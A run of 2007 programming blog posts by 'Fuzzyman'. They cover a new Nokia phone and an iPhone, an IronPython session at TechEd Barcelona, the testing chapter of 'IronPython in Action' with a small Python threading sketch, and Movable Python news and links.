Well, having been very good and decided that I didn't really need an iPhone, I went ahead and got a new contract with a Nokia 6300. This replaces a Symbian-based N70 which I was never happy with [1] and never used as anything more than a simple phone.
The 6300 is a mobile phone - plain and simple. It is slim with enough weight to feel solid and has a nice clean and bright user interface. For anyone who just wants a phone I can recommend it. My new contract is £12 a month and includes more minutes and texts than I will use - so I was pretty happy with it.
But... oh irony of sweet ironies, someone went and gave me an iPhone! It didn't have the 1.1.1 firmware, so I've been able to activate it, but haven't yet unlocked it. I agree in principle with everything Mark Pilgrim said about the iPhone, but...
This thing is frikkin awesome. It simply doesn't compare to any mobile device I've ever used. I can totally understand why people are prepared to invest hours hacking them. It really is game changing for phones and PDAs. The UI is very different to all the other platforms I've used, with countless little touches in that make it fun and easy to use.
I've only played with it over wifi, and beyond what I needed to activate I haven't installed anything, but the things I'm already impressed with include:
- The YouTube integration is fantastic
- The gmail client is very nice
- The google maps integration is impressive
- Google reader on safari works fine
- Google calendar via safari also works fine
- The way you zoom in and out to view parts of a web page in safari is genius
- Flicking through albums in the iPod is just plain sweet
Unfortunately my music collection is now ten gb and the iPhone only holds eight, but it's not like I need that much at any one time... (The camera is a bit above average for a phone camera - i.e. not brilliant, but you have a bigger screen to view it on.)
I don't have a data deal on my new contract, but I do have a data-only SIM that I use with a 3G modem when I commute. This SIM supports GPRS and EDGE so I'm hoping it will work with the iPhone. This means that I will still carry two phones (both slender beauties), but can ditch the iPod which is a step in the right direction. My main use for a PDA was as a calendar and a book reader. I stopped using a PDA because getting Windows Mobile based PDAs to sync with google calendar was difficult / impossible. The iPhone solves that problem, but I wonder if I will be able to use it as an ebook reader?
By the way, the tutorial I followed to activate (and hopefully soon unlock) the phone was: How to Unlock your iPhone.
Update
Now unlocked and working fine with my data-only T-mobile SIM. My Three network SIM doesn't work with the iPhone though.
To get data across the phone network I needed to set the correct APN for T-Mobile UK in the network settings.
Oh, and because the touch screen works by electrical conductivity you can't use your fingernails for more accurate touching.
Posted by Fuzzyman on 2007-10-11 11:15:15
Categories: Computers, Life
IronPython and Resolver at TechEd Barcelona
November 5 - 9th in Barcelona is (yet another) Microsoft developer event: TechEd Europe.
I'll be demonstrating Resolver as a powerful application written with IronPython. Luckily the IronPython team is part of the Microsoft development team and not the Office team.
I'll be speaking along with Mahesh Prakriya and Martin Maly, both initimately involved with IronPython. Our session is:
WEB305 - "IronPython" and Dynamic Languages on .NET
Mahesh Prakriya, Martin Maly, Michael Foord.
IronPython also features in the following sessions:
WEB307 - Developing Data Driven Applications Using the New Dynamic Data Controls in ASP.NET
Shanku Niyogi
ASP.NET dynamic data controls are part of a powerful, rich new framework that lets you create data-driven ASP.NET applications very easily. ASP.NET dynamic data controls do this by automatically discovering the schema at runtime, deriving behavior from the database and finally creating an ASP.NET page. Anything that can be inferred from the schema works with almost no user effort. If needed, the page can then [...]

WEB315 - Silverlight, ASP.NET and Web Services in IronPython & IronRuby
Mahesh Prakriya
After attending this talk you will learn how to use dynamic languages (such as IronPython, JScript, VBx and IronRuby) in Silverlight and ASP.NET. The overall dynamic languages initiative and the Dynamic Language Runtime (DLR) will also be covered. ASP.NET and Silverlight are two great example hosts of the DLR, and the languages listed above are implemented on the DLR. We will first demo Python and Ruby in Silverlight, then Python in ASP.NET, and will end with web services demos.

WEB08-IS - Building Languages With The Dynamic Language Runtime
Martin Maly
Dynamic [...] the key pieces of the compiler and plug it into the DLR. If you are interested in compiler technology or dynamic languages, this talk is definitely for you.
Now my guess is that not many of my regular readers will be at TechEd, but if you'll be there then let me know and we'll grab a beer. There are lots of other sessions of course, and quite a few of them look interesting. I'll hopefully be attending sessions on functional and concurrent programming with .NET, working with database APIs (OLE DB, ODBC and Entity), introduction to the reflection API and a few more.
Posted by Fuzzyman on 2007-10-09 16:55:24
Categories: General Programming, Work, IronPython
Testing in IronPython in Action
I've nearly finished writing the chapter on testing in IronPython in Action (just the summary to go) and I'm pretty pleased with it.
In this chapter I managed to cover:
- Some discussion of what unit testing is and why test
- Setting up a test framework for an application using unittest, and writing tests with it
- Mock objects
- Monkey patching
- A useful test pattern involving a Listener class
- Functional testing a GUI application (including writing a User Story)
- For the functional testing we need to use .NET threads for synchronously and asynchronously interacting with the GUI thread
I particularly like the functional test section, as it makes the example application 'dance'.
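As a language-agnostic illustration of that last point (my sketch, not the book's code): a "GUI thread" is essentially a message pump that executes queued callables, with an Invoke-style helper that blocks the test thread until the call completes, and a BeginInvoke-style helper that returns immediately.

```python
import queue
import threading

class FakeGuiLoop:
    """Stand-in for a GUI message pump: runs queued callables on one thread."""

    def __init__(self):
        self._jobs = queue.Queue()
        self._thread = threading.Thread(target=self._pump, daemon=True)
        self._thread.start()

    def _pump(self):
        while True:
            job = self._jobs.get()
            if job is None:
                break
            fn, done, box = job
            box.append(fn())      # execute on the "GUI" thread
            done.set()

    def invoke(self, fn):
        """Synchronous: block the calling (test) thread until fn has run."""
        done = threading.Event()
        box = []
        self._jobs.put((fn, done, box))
        done.wait()
        return box[0]

    def begin_invoke(self, fn):
        """Asynchronous: queue fn and return immediately."""
        self._jobs.put((fn, threading.Event(), []))

    def stop(self):
        self._jobs.put(None)

loop = FakeGuiLoop()
gui_name = loop.invoke(lambda: threading.current_thread().name)
loop.stop()
```

In the real tests the pump is Windows Forms' own message loop and the helpers are Control.Invoke and Control.BeginInvoke, but the synchronisation pattern is the same.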
In a few weeks this chapter (along with the next three chapters) goes for its first review. After that I will probably make all the source code available for download, so that even if you don't buy the book (shock and horror) you still get to play with the examples.
Posted by Fuzzyman on 2007-10-08 14:25:52
Categories: IronPython, Writing
New Movable Python Demo, plus Other Randomations
I've had quite a few visitors to the Movable Python pages from this link:
The Movable Python demo version was out of date, so I've posted an updated one. The new free trial is good until May 2008.
A couple of months or so back I promised that 40% of all purchases would be split between the PSF and the OLPC project. Plus, once sales reached £500 Movable Python would be Open Sourced.
It's well over half way towards that goal (around 65% actually) - so if you want to see Movable Python Open Source, you know what to do.
Oh, interesting link. Sam Ruby on why he thinks Python (and Perl!) has competent language designers (it is possible to specify source code encoding).
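(The declaration in question is PEP 263's coding comment; a quick illustration added here for reference:)

```python
# -*- coding: utf-8 -*-
# PEP 263: this comment, on line 1 or 2 of a file, tells Python 2 how the
# source bytes are encoded, so non-ASCII string literals are safe.
# Python 3 assumes UTF-8 by default, so the declaration is optional there.
greeting = u'café'
print(greeting)
```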
Interesting link number two. The OpenMoko project is an open cell phone platform. It is a great idea, and not too shabby an implementation either, but the specs of the first version were a little too raw for my tastes. Some guy with a great domain name has posted the specs of the first version side by side with the next version (at one point slated for availability this month): The Open Source iPhone. The specs look very tasty, and there is a promise of basic functionality in the software. If it actually works as a phone (which isn't promised for the Neo, the current phone), then I think I will go for it. Mono works on OpenMoko, so both Python and IronPython should run (and with IronPython through GTK# it might be easier to create user interfaces).
Interesting link number three. A post by why on My Complete List Of Substitute Names For The Maneuver We Now Know To Be Monkeypatching. Could this really be a Ruby programmer acknowledging that rampant patching is perhaps not always the best of practices?
Interesting link number four. Developer versions of The Chumby are now available to order. Unfortunately only for shipping in the US, so I have an invite (they cost $180!) if anyone wants one. The Chumby is a soft toy with a programmable computer type widgety display thing and wifi built in. Widgets are written in Flash, but it runs Python, so it could be fun.
Posted by Fuzzyman on 2007-10-08 13:34:28
Categories: Python, Projects, Computers, General Programming
This work is licensed under a Creative Commons Attribution-Share Alike 2.0 License.